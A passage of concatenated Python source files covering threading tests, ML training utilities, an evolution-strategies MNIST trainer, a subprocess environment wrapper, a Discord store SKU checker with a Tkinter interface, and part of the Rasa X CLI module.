sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(unittest.TestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
def main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
main()
|
fn.py
|
import warnings
from typing import List
import os
import re
import random
import time
import multiprocessing as mp
import psutil
import numpy as np
import torch
from prettytable import PrettyTable
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
def seed_everything(seed=1000):
"""seed everything to reproduce your experiments
:param int seed: default 1000
:return: None
"""
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
def set_devices(device_ids: List[int]):
"""setting the global environment of CUDA
:param device_ids: list of device id, [-1] is cpu
:return: torch.device
"""
if type(device_ids) != list:
raise TypeError(f'the gpus type should be List[int], not {type(device_ids)}')
if len(device_ids) > 1:
warnings.warn(f'we only support cpu or single gpu now, '
f'but you input {len(device_ids)} device id, and only the first will be used')
os.environ['CUDA_VISIBLE_DEVICES'] = str(device_ids[0])
if device_ids[0] != -1:
print(f'Training on GPU {device_ids}')
return torch.device('cuda')
else:
print('Training on CPU')
return torch.device('cpu')
def count_params(model, show=False):
num_params = 0
if show:
for name, p in model.named_parameters():
print(f'{name}: {str(p.size())}')
num_params += p.numel()
else:
for name, p in model.named_parameters():
num_params += p.numel()
return num_params
def format_runTime(seconds:float):
"""format running time to `day hours:minutes:seconds`
:param seconds: 通常来说是两次time.time()的差值
:return: format string
"""
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
h = '0' + str(int(h)) if h < 10 else str(int(h))
m = '0' + str(int(m)) if m < 10 else str(int(m))
s = '0' + str(int(s)) if s < 10 else str(int(s))
if d == 0:
return f'{h}:{m}:{s}'
else:
return f'{d}d {h}:{m}:{s}'
class ProcessStatus():
"""记录程序运行过程中GPU/CPU/内存的全局使用情况(不一定是主进程的实际使用情况,暂未实现进程跟踪功能)
>>> gpu = 0 # 指定0号GPU,或者为None,不指定GPU
>>> processStatus = ProcessStatus(gpu)
>>> p = mp.Process(target=processStatus.record_running_status, args=(1,))
>>> p.start() # 开始执行监控进程
>>> # 执行主进程,例如运行程序
>>> p.terminate() # 终结监控进程
>>> processStatus.print_statisticAnalysis() # 打印表信息
>>> processStatus.plot_running_info() # 打印图信息
"""
def __init__(self, gpu:int=None):
self.start = time.time()
self.running_info = mp.Manager().list()
self.gpu = gpu
if gpu:
import pynvml
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(gpu)
gpu_info = pynvml.nvmlDeviceGetMemoryInfo(handle)
self.device_total_memory = round(gpu_info.total/1024**2) # MiB
self.driver_version = pynvml.nvmlSystemGetDriverVersion().decode('utf-8')
self.device_name = pynvml.nvmlDeviceGetName(handle).decode('utf-8')
pynvml.nvmlShutdown()
def record_running_status(self, interval=1):
"""供多进程调用,监控程序运行过程中的GPU、CPU、内存变化
:param interval: 记录间隔,默认 1s 记录一次
:return: 不间断运行,直至主进程内结束该子进程
"""
start = self.start
if self.gpu != None: # 指定GPU的情况下
import pynvml
pynvml.nvmlInit()
while True:
cur_time = time.time()
if cur_time - start >= interval:
start = cur_time
handle = pynvml.nvmlDeviceGetHandleByIndex(self.gpu)
gpu_info = pynvml.nvmlDeviceGetMemoryInfo(handle)
mem = psutil.virtual_memory()
self.running_info.append({
'cur_time': cur_time,
'gpu_used': round(gpu_info.used / 1024 ** 2, 2), # GPU显存占用量(MiB)
'gpu_util': pynvml.nvmlDeviceGetUtilizationRates(handle).gpu, # GPU使用率(0~100)
'cpu_util': psutil.cpu_percent(), # CPU使用率(0.0~100.0)
'mem_util': mem.percent, # 内存使用率(0.0~100.0)
'mem_used': round(mem.used / 1024 ** 2) # 内存占用量(MiB)
})
else: # 不指定GPU的情况下
while True:
cur_time = time.time()
if cur_time - start >= interval:
start = cur_time
mem = psutil.virtual_memory()
self.running_info.append({
'cur_time': cur_time,
'cpu_util': psutil.cpu_percent(), # CPU使用率(0.0~100.0)
'mem_util': mem.percent, # 内存使用率(0.0~100.0)
'mem_used': round(mem.used / 1024 ** 2) # 内存占用量(MiB)
})
def print_statisticAnalysis(self):
"""统计分析程序运行时间以及GPU/CPU/内存使用情况,以表格形式呈现
"""
start = self.start
table = PrettyTable(['Param', 'Value'])
if self.gpu != None: # 指定GPU的情况下
table.add_row(['cuda version', torch.version.cuda])
table.add_row(['driver version', self.driver_version])
table.add_row(['device', self.device_name])
table.add_row(['device id', self.gpu])
table.add_row(['start time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start))])
table.add_row(['end time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())])
table.add_row(['running time', format_runTime(time.time() - start)])
table.add_row(['device total memory', f'{self.device_total_memory} MiB'])
table.add_row(['device max used memory', f"{round(np.max([t['gpu_used'] for t in self.running_info]), 2)} MiB"])
table.add_row(['device avg util ratio', f"{round(np.mean([t['gpu_util'] for t in self.running_info]), 2)}%"])
else: # 不指定GPU的情况下
table.add_row(['start time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start))])
table.add_row(['end time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())])
table.add_row(['running time', format_runTime(time.time() - start)])
table.add_row(['cpu avg util ratio', f"{round(np.mean([t['cpu_util'] for t in self.running_info]), 2)}%"])
table.add_row(['memory max used', f"{round(np.max([t['mem_used'] for t in self.running_info]), 2)} MiB"])
table.add_row(['memory avg util ratio', f"{round(np.mean([t['mem_util'] for t in self.running_info]), 2)}%"])
table.align['Param'] = 'l'
table.align['Value'] = 'l'
print(table)
def plot_running_info(self, show=False, saved_path='./status.png'):
"""以图表形式展现程序运行过程中的GPU/CPU/内存使用情况,默认不显示,只保存在'./status.png'
:param show: 是否调用plt.show()画出该图
:param saved_path: 将图保存在指定位置
"""
font = FontProperties()
font.set_family('serif')
font.set_name('Times New Roman')
font.set_style('normal')
font.set_size(12)
plt.style.use(['science', 'no-latex'])
plt.figure(figsize=(12, 12), dpi=300)
cur_time = [item['cur_time']-self.start for item in self.running_info]
cpu_util = [item['cpu_util'] for item in self.running_info]
mem_util = [item['mem_util'] for item in self.running_info]
mem_used = [item['mem_used'] for item in self.running_info]
if self.gpu != None:
gpu_used = [item['gpu_used'] for item in self.running_info]
gpu_util = [item['gpu_util'] for item in self.running_info]
ax = plt.subplot(2, 1, 1)
ax.plot(cur_time, gpu_util, label='gpu_util')
ax.plot(cur_time, cpu_util, label='cpu_util')
ax.plot(cur_time, mem_util, label='mem_util')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_ylabel('percentage', font_properties=font, fontsize=16)
plt.legend()
ax = plt.subplot(2, 1, 2)
ax.plot(cur_time, gpu_used, label='gpu_used')
ax.plot(cur_time, mem_used, label='mem_used')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_xlabel('time', font_properties=font, fontsize=16)
plt.gca().set_ylabel('capacity', font_properties=font, fontsize=16)
plt.legend()
plt.title("status", font_properties=font, fontsize=20)
else:
ax = plt.subplot(2, 1, 1)
ax.plot(cur_time, cpu_util, label='cpu_util')
ax.plot(cur_time, mem_util, label='mem_util')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_ylabel('percentage', font_properties=font, fontsize=16)
plt.legend()
ax = plt.subplot(2, 1, 2)
ax.plot(cur_time, mem_used, label='mem_used')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_xlabel('time', font_properties=font, fontsize=16)
plt.gca().set_ylabel('capacity', font_properties=font, fontsize=16)
plt.legend()
plt.title("status", font_properties=font, fontsize=20)
if show:
plt.show()
if saved_path:
plt.savefig('./status.png')
class Timer(object):
"""Computes elapsed time."""
def __init__(self, name):
self.name = name
self.running = True
self.total = 0
self.start = round(time.time(), 2)
self.intervalTime = round(time.time(), 2)
print("<> <> <> Starting Timer [{}] <> <> <>".format(self.name))
def reset(self):
self.running = True
self.total = 0
self.start = round(time.time(), 2)
return self
def interval(self, intervalName=''):
intervalTime = self._to_hms(round(time.time() - self.intervalTime, 2))
print("<> <> Timer [{}] <> <> Interval [{}]: {} <> <>".format(
self.name, intervalName, intervalTime))
self.intervalTime = round(time.time(), 2)
return intervalTime
def stop(self):
if self.running:
self.running = False
self.total += round(time.time() - self.start, 2)
return self
def resume(self):
if not self.running:
self.running = True
self.start = round(time.time(), 2)
return self
def time(self):
if self.running:
return round(self.total + time.time() - self.start, 2)
return self.total
def finish(self):
if self.running:
self.running = False
self.total += round(time.time() - self.start, 2)
elapsed = self._to_hms(self.total)
print("<> <> <> Finished Timer [{}] <> <> <> Total time elapsed: {} <> <> <>".format(self.name, elapsed))
return elapsed
def _to_hms(self, seconds):
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
return "%dh %02dm %02ds" % (h, m, s)
class Dict2Obj():
"""
将嵌套字典转换成对象,将关键字访问替换成属性访问
>>> t = Dict2Obj()
>>> t.x1 = 3e-5
>>> t.x2.x21 = [8]
>>> t.x2.x22 = 16
>>> t.update({
>>> 'x3': 0.1,
>>> 'x2': {'x22': 32, 'x23': 64},
>>> 'x4': {'x41':'yyy'}
>>> })
>>> t.toDict() # {'x1': 3e-05, 'x2': {'x21': [8], 'x22': 32, 'x23': 64},
>>> # 'x3': 0.1, 'x4': {'x41': 'yyy'}}
>>> print(t) # str of t.toDict()
"""
def __init__(self, init_dict=None):
if init_dict:
for key, value in init_dict.items():
if self._is_valid(key):
if type(value) is dict:
self.__setattr__(key, Dict2Obj(value))
else:
self.__setattr__(key, value)
def __getattr__(self, key):
"""访问一个不存在的属性时,调用该函数"""
if self._is_valid(key):
self.__setattr__(key, Dict2Obj({}))
return self.__getattribute__(key)
def __repr__(self):
return str(self.toDict())
def update(self, aux_dict):
for key, value in aux_dict.items():
if self._is_valid(key):
if type(value) is dict:
if hasattr(self, key):
self.__getattribute__(key).update(value)
else:
self.__getattr__(key).update(value)
else:
self.__setattr__(key, value)
def _is_valid(self, key):
if type(key) is str and re.match(r'[a-zA-Z_][0-9a-zA-Z_]*', key):
return True
raise ValueError(f'{key} is not a valid variable, please check manually')
def toDict(self):
target = {}
for key, value in self.__dict__.items():
if type(value) is not Dict2Obj:
target[key] = value
else:
target[key] = value.toDict()
return target
|
mlp_es.py
|
"""
Evolutionary strategies implementation for training a neural network
"""
import time
import threading
import math
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
INPUT_DIMENSIONS = [28, 28, 1]
# Hyper params
BATCH_SIZE = 200
EPOCHS = 1500
POP_SIZE = 50
NUM_WORKERS = 2
# Display log messages after every LOG_FREQUENCY iterations during training
LOG_FREQUENCY = 1
# Some MLP networks - can be replaced with deeper MLPs or Covnets
def inference_1_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 1 layer
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 10, activation_fn=None, reuse=reuse, scope='layer1')
return te_net
def inference_2_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 2 layers
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 128, activation_fn=tf.nn.selu, reuse=reuse, scope='layer1')
te_net = slim.fully_connected(te_net, 10, activation_fn=None, reuse=reuse, scope='layer2')
return te_net
def reward(te_inference, tp_labels):
"""
Reward for the current inference, negative of the traditional loss
:te_inference: expression for logits
:tp_labels: placeholder for true labels
:return: reward expression
"""
return -tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tp_labels, logits=te_inference))
def accuracy(te_inference, tp_labels):
"""
Construct accuracy expression
:te_inference: expression for logits
:tp_labels: true label placeholder
:return: accuracy expression
"""
te_correct_prediction = tf.equal(tf.argmax(te_inference, 1), tf.argmax(tp_labels, 1))
return tf.reduce_mean(tf.cast(te_correct_prediction, tf.float32))
def placeholders():
"""
Creates placeholders for inputs and labels
"""
tp_input = tf.placeholder(tf.float32, shape=[None, INPUT_DIMENSIONS[0] * INPUT_DIMENSIONS[1]])
tp_label = tf.placeholder(tf.float32, shape=[None, 10])
return tp_input, tp_label
def iterate_minibatches(input_set, target_set, batch_size, shuffle=False):
"""
Generator to yield minibatches for a training set
:input_set: input feature set
:target_set: target labels for the features
:batch_size: batch size for minibatch
:shuffle: shuffle the data
"""
if shuffle:
indices = np.arange(len(input_set))
np.random.shuffle(indices)
for start_idx in range(0, len(input_set) - batch_size + 1, batch_size):
if shuffle:
excerpt = indices[start_idx:start_idx + batch_size]
else:
excerpt = slice(start_idx, start_idx + batch_size)
yield input_set[excerpt], target_set[excerpt]
def train(n_epochs, population_size=50, learning_rate=0.001, sigma=0.01, n_workers=4, resume=False):
"""
Train using ES algorithm, parallizes on a single CPU across multiple threads
:n_epochs: number of training epochs
:population_size: size of population used in ES
:learning_rate: ES hyperparameter
:sigma: ES hyperparameter
:n_workers: number of parallel threads
"""
# load the dataset
dataset = input_data.read_data_sets('./data/', one_hot=True)
# uncomment to use a smaller set
train_images = dataset.train.images # [:600]
train_labels = dataset.train.labels # [:600]
# validation data
validate_images = dataset.validation.images
validate_lables = dataset.validation.labels
def fitness_shaping(rewards):
"""
A rank transformation on the rewards, which reduces the chances
of falling into local optima early in training.
Borrowed from https://github.com/atgambardella/pytorch-es/blob/master/train.py#L86
"""
sorted_rewards_backwards = sorted(rewards)[::-1]
lamb = len(rewards)
shaped_rewards = []
denom = sum(
[max(0, math.log(lamb / 2 + 1, 2) - math.log(sorted_rewards_backwards.index(r) + 1, 2)) for r in rewards])
for r in rewards:
num = max(0, math.log(lamb / 2 + 1, 2) - math.log(sorted_rewards_backwards.index(r) + 1, 2))
shaped_rewards.append(num / denom + 1 / lamb)
return shaped_rewards
def create_feed_dict(x, t, params):
"""
Utility method to create a feed dictionary
"""
f_dict = {tp_input: x, tp_labels: t}
for te_l_p, param in zip(te_layer_params, params):
f_dict[te_l_p] = param
return f_dict
def worker(i, perturbed_params, rewards):
"""
Runs the whole dataset with given params and return the reward with these params
"""
for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
rewards[i] += sess.run(te_reward, feed_dict=create_feed_dict(batch[0], batch[1], perturbed_params))
with tf.Graph().as_default():
# create network and reward/accuracy expressions
tp_input, tp_labels = placeholders()
te_inference = inference_2_layer_mlp(tp_input)
te_reward = reward(te_inference, tp_labels)
te_accuracy = accuracy(te_inference, tp_labels)
# create session
init = tf.global_variables_initializer()
config = tf.ConfigProto(
device_count={'GPU': 0}
)
sess = tf.Session(config=config)
sess.run(init)
# logging
duration = 0
print('-' * 86)
print('%-10s | %-20s | %-20s | %-10s' % ('Step', 'Reward', 'Accuracy', 'Time(s)'))
print('-' * 86)
summary_writer = tf.summary.FileWriter('./summaries_es', sess.graph)
saver = tf.train.Saver()
# create initial param vector
te_layer_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='mnist_es')
params = []
if resume:
params = np.load("./saved_models/mnist_es_params.npy")
else:
for te_p in te_layer_params:
params.append(sess.run(te_p))
# train for specified number of epochs
for epoch in range(n_epochs):
start_time = time.time()
# arrays for saving seeds, parameters and rewards
seeds = []
perturbed_params = []
rewards = [0] * population_size
for _ in range(int(population_size / 2)):
# save the seeds and params - the perturbations are in pairs, + and -
np.random.seed()
seeds.append(np.random.randint(2 ** 30))
seeds.append(seeds[-1])
perturbed_params.append([])
perturbed_params.append([])
np.random.seed(seeds[-1])
# perturbations are normal distribution samples with 0 mean
for param in params:
perturbed_params[-2].append(param + sigma * np.random.normal(0, 1, param.shape))
perturbed_params[-1].append(param - sigma * np.random.normal(0, 1, param.shape))
# evaluate each perturbation to get the rewards
for worker_batch_idx in range(int(population_size / n_workers)):
processes = []
for worker_idx in range(n_workers):
i = worker_batch_idx * n_workers + worker_idx
p = threading.Thread(target=worker, args=(i, perturbed_params[i], rewards))
p.start()
processes.append(p)
for p in processes:
p.join()
# logging
val_reward = np.mean(rewards)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="reward", simple_value=val_reward),
]), epoch)
# fitness shaping
shaped_rewards = fitness_shaping(rewards)
# parameter update based on rewards
sign = 1
for pop_idx in range(int(population_size)):
np.random.seed(seeds[pop_idx])
for i in range(len(params)):
params[i] = params[i] + sign * learning_rate / (population_size * sigma) * shaped_rewards[
pop_idx] * np.random.normal(0, 1, params[i].shape)
sign *= -1
duration += (time.time() - start_time)
# logging
if epoch % LOG_FREQUENCY == 0:
# for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
# val_acc = sess.run(te_accuracy, feed_dict=create_feed_dict(batch[0], batch[1], params))
# print('%-10s | %-20s | %-20s | %-10s' % (
# '%d' % epoch, '%.5f' % val_reward, '%.5f' % val_acc, '%.2f' % duration))
# summary_writer.add_summary(tf.Summary(value=[
# tf.Summary.Value(tag="accuracy", simple_value=val_acc),
# ]), epoch)
# break
val_acc = 0.0
for i in range(0, len(validate_images), BATCH_SIZE):
val_acc += sess.run(te_accuracy, feed_dict=create_feed_dict(validate_images[i:i + BATCH_SIZE],
validate_lables[i:i + BATCH_SIZE],
params))
val_acc = val_acc * BATCH_SIZE / len(validate_images)
print('%-10s | %-20s | %-20s | %-10s' %
('%d' % epoch, '%.5f' % val_reward, '%.5f' % val_acc, '%.2f' % duration))
summary_writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag="accuracy", simple_value=val_acc), ]),
epoch)
duration = 0
# evaluate Final Test Accuracy
mnist_test_images = dataset.test.images
mnist_test_labels = dataset.test.labels
np.save("./saved_models/mnist_es_params.npy", np.array(params))
overall_acc = 0.0
for i in range(0, len(mnist_test_images), BATCH_SIZE):
overall_acc += sess.run(te_accuracy, feed_dict=create_feed_dict(mnist_test_images[i:i + BATCH_SIZE],
mnist_test_labels[i:i + BATCH_SIZE],
params))
print('\nFinal test accuracy: %g' % (overall_acc * BATCH_SIZE / len(mnist_test_images)))
if __name__ == '__main__':
train(EPOCHS, population_size=POP_SIZE, n_workers=NUM_WORKERS, resume=False)
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [
Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)
]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
|
threads.py
|
from transitions.extensions import LockedMachine as Machine
from threading import Thread
import sys
import time
states_A = ['A', 'B', 'C']
machine = Machine(states=states_A, initial='A')
states_B = ['M','N','O']
machineB = Machine(states = states_B, initial = 'M')
def func_states_A():
while(1):
ctrl = input("Insert a letter for fsm A: \n")
if (ctrl == '1'):
machine.to_A()
elif (ctrl == '2'):
machine.to_B()
elif (ctrl == '3'):
machine.to_C()
print(machine.state)
def func_states_B():
while(1):
ctrl = input("Insert a letter for fsm B: \n")
if (ctrl == 'a'):
machineB.to_M()
elif (ctrl == 's'):
machineB.to_M()
elif (ctrl == 'd'):
machineB.to_O()
print(machineB.state)
thread_A = Thread(target=func_states_A)
thread_A.start()
thread_B = Thread(target = func_states_B)
thread_B.start()
thread_A.join()
|
main.py
|
from threading import Thread, Event
from queue import Queue
from tkinter import Tk, ttk
from time import sleep as wait
from loggingFramework import Logger
import requests
import json
import sys
logger = Logger()
def handle_exception(etype, value, traceback):
logger.logException(value)
quit()
sys.excepthook = handle_exception
skuKey = "primary_sku_id"
logger.logInfo("Getting games list")
datajson = requests.get("https://discordapp.com/api/v6/applications/detectable").json()
logger.logInfo("Building Interface")
root = Tk()
root.title("Search Discord for games!")
root.geometry('400x250+1000+300')
lb0 = ttk.Label(root, text="{} games to check. Estimated time: {} minutes".format(len(datajson), round((len(datajson) * 1) / 60, 2)))
lb0.pack()
lb1 = ttk.Label(root, text="Checked {} out of {} games".format("0", len(datajson)))
lb1.pack()
lb2 = ttk.Label(root, text="Press Start to begin searching")
lb2.pack()
pb = ttk.Progressbar(root, maximum=len(datajson), mode="determinate")
pb.pack(expand=True)
info_queue = Queue()
info_event = Event()
term_event = Event()
s_term_event = Event()
def start():
logger.logInfo("Starting...")
global updateThread
global searchT
s_term_event.clear()
btn["state"] = "disabled"
root.title("Searching Discord for games...")
updateThread = Thread(target=updateGUI, args=(info_queue, info_event, term_event))
searchT = Thread(target=search, args=(info_queue, info_event, term_event, s_term_event))
updateThread.start()
wait(0.1)
searchT.start()
def cancelSearch():
btn["state"] = "normal"
root.title("Searching Discord for games... Cancelled")
s_term_event.set()
def updateGUI(in_queue, in_event, term_event_in):
logger.logInfo("[Update]: Starting...", True)
while True:
is_set = in_event.wait(10)
if is_set:
try:
lb0text = in_queue.get()
lb1text = in_queue.get()
lb2text = in_queue.get()
pbvalue = in_queue.get()
lb0.config(text = lb0text)
lb1.config(text = lb1text)
lb2.config(text = lb2text)
pb["value"] = pbvalue
in_event.clear()
except Exception as e:
logger.logException(e)
s_term_event.set()
term_event_in.set()
if term_event_in.is_set() is True:
logger.logInfo("[Update]: Terminating...", True)
return
def search(queue_out, event_out, term_event_out, term_event_in):
logger.logInfo("[Search]: Starting...", True)
maxItems = len(datajson)
cItem = 1
workingSKUS = []
SKUCount = 0
queue_out.put("Checked {} out of {} games".format("0", len(datajson)))
queue_out.put("Starting")
queue_out.put("Please wait...")
queue_out.put(0)
event_out.set()
#root.update()
wait(2)
for item in datajson:
try:
while True:
r = requests.get("https://discordapp.com/api/v6/store/published-listings/skus/{}".format(item[skuKey]))
if r.status_code == 404:
break
elif r.status_code == 200:
workingSKUS.append(item)
break
elif r.status_code == 429:
wait(10)
continue
else:
break
SKUCount += 1
except KeyError:
pass
except Exception as e:
logger.logException(e)
cItem += 1
while not queue_out.empty():
pass
queue_out.put("Checked {} out of {} games".format(cItem - 1, len(datajson)))
queue_out.put("Checking {}".format(item["name"]))
queue_out.put("{} SKU IDs have been checked and I've found {} working SKUs so far".format(SKUCount, len(workingSKUS)))
queue_out.put(cItem - 1)
event_out.set()
wait(1)
if term_event_in.is_set():
logger.logInfo("[Search]: Terminating...", True)
term_event_out.set()
return
listString = []
for item in workingSKUS:
listString.append("{} : https://discord.com/store/skus/{}".format(item["name"], item[skuKey]))
logger.logInfo("Writing to file...")
with open("output.txt", "w") as outputfile:
outputfile.write("\n".join(listString))
queue_out.put(lb0["text"])
queue_out.put("Completed! Please check the new output.txt file")
queue_out.put("Found {} working SKUs".format(len(workingSKUS)))
queue_out.put(pb["value"])
event_out.set()
term_event_out.set()
btn = ttk.Button(root, text="Start", command=start)
btn.pack()
cbtn = ttk.Button(root, text="Cancel", command=cancelSearch)
cbtn["state"] = "disabled"
cbtn.pack()
logger.logInfo("Interface built, starting main loop!")
root.mainloop()
|
x.py
|
import argparse
import asyncio
import importlib.util
import logging
from multiprocessing import get_context
import os
import signal
import sys
import traceback
from typing import Iterable, List, Optional, Text, Tuple
import aiohttp
import ruamel.yaml as yaml
from rasa.cli import SubParsersAction
from rasa.cli.arguments import x as arguments
import rasa.cli.utils
from rasa.constants import (
DEFAULT_LOG_LEVEL_RASA_X,
DEFAULT_RASA_PORT,
DEFAULT_RASA_X_PORT,
)
from rasa.shared.constants import (
DEFAULT_CONFIG_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_ENDPOINTS_PATH,
DOCS_BASE_URL_RASA_X,
)
from rasa.core.utils import AvailableEndpoints
from rasa.shared.exceptions import RasaXTermsError
import rasa.shared.utils.cli
import rasa.shared.utils.io
import rasa.utils.common
from rasa.utils.endpoints import EndpointConfig
import rasa.utils.io
logger = logging.getLogger(__name__)
DEFAULT_EVENTS_DB = "events.db"
def add_subparser(
subparsers: SubParsersAction, parents: List[argparse.ArgumentParser]
) -> None:
"""Add all rasa x parsers.
Args:
subparsers: subparser we are going to attach to
parents: Parent parsers, needed to ensure tree structure in argparse
"""
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace,
endpoints: AvailableEndpoints,
rasa_x_url: Optional[Text] = None,
credentials_path: Optional[Text] = None,
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
# needs separate logging configuration as it is started in its own process
rasa.utils.common.set_log_level(args.loglevel)
rasa.utils.io.configure_colored_logging(args.loglevel)
if not credentials_path:
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
ssl_certificate=args.ssl_certificate,
ssl_keyfile=args.ssl_keyfile,
ssl_ca_file=args.ssl_ca_file,
ssl_password=args.ssl_password,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url: Optional[Text] = None
) -> Text:
credentials_path = rasa.cli.utils.get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = rasa.shared.utils.io.read_config_file(credentials_path)
else:
credentials = {}
# this makes sure the Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = rasa.utils.io.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
def _overwrite_endpoints_for_local_x(
endpoints: AvailableEndpoints, rasa_x_token: Text, rasa_x_url: Text
):
endpoints.model = _get_model_endpoint(endpoints.model, rasa_x_token, rasa_x_url)
endpoints.event_broker = _get_event_broker_endpoint(endpoints.event_broker)
def _get_model_endpoint(
model_endpoint: Optional[EndpointConfig], rasa_x_token: Text, rasa_x_url: Text
) -> EndpointConfig:
# If you change that, please run a test with Rasa X and speak to the bot
default_rasax_model_server_url = (
f"{rasa_x_url}/projects/default/models/tags/production"
)
model_endpoint = model_endpoint or EndpointConfig()
# Checking if endpoint.yml has existing url, if so give
# warning we are overwriting the endpoint.yml file.
custom_url = model_endpoint.url
if custom_url and custom_url != default_rasax_model_server_url:
logger.info(
f"Ignoring url '{custom_url}' from 'endpoints.yml' and using "
f"'{default_rasax_model_server_url}' instead."
)
